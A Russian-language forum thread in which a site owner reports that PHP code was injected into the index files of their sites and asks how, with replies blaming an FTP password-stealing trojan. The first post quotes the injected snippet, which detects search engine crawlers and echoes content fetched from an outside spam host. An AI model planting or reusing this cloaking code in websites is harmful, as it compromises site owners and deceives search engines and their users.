Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Поломали! Как?, Внедрили в индексный файл свою рекламу
 
Каким-то образом вчера нам в индексные файлы засунули это (во все наши сайты на этом хостинге):
Код
<?php  $h = gethostbyaddr($_SERVER["REMOTE_ADDR"]); if (eregi("google", $h) || eregi("yandex", $h) || eregi("msn", $h) || eregi("aol", $h)) { foreach ($_GET as $key=>$val) $str .= '&'.urlencode($key).'='.urlencode($val); echo file_get_contents('http://kotovasia.com/6/naeb.php?host='.$_SERVER['SERVER_NAME'].$str); } ?>

Очевидно, подсовывает поисковикам код с указанного сайта. Поиск находит несколько сайтов, где подобный скрипт некорректно срабатывает и выявляется ошибка.
Главный вопрос - как это сделали? Вряд-ли получили доступ к фтп,  но пароль уже сменили. На сайте есть пхпбб последней версии. Взломанные сайты из поиска размещены на самых разных хостингах, так что не обязательно с ним связано.
 
телепаты в отпуске.

Apache? OpenSSH? Что еще есть? Весрии новые? система какая?
 
Server Type: Apache/2.0.46 (Red Hat)
хостер rusonyx.ru
весь сайт на php, в некоторых местах в адресе передаются параметры (названия разделов, номера страниц), иного ввода нет.
OpenSSH - не используем
Ещё есть Advanced Web Statistics 6.6 (build 1.887), не запоролен.

Пороюсь в логах
 
Почти 100% проблема в FTP. Троян на клиентском компьютере. Смена паролей тут не поможет, троян и новые сможет использовать.
Проверьте компьютеры всех кто работает с FTP. В последнее время это болезнь.

А вообще лучше отказаться с FTP.
Хочешь быть мудрым? Не желай всего, что видишь; не верь всему, что слышишь; не говори всего, что знаешь; не делай всего, что умеешь, а только то, что полезно.
 
Ну, обижаете. Не первый год с компами вожусь, да ещё с моей-то паранойей... Я б скорее подумал, что в локалке кто снифит, но судя по масштабам - исключено.
Страницы: 1
Читают тему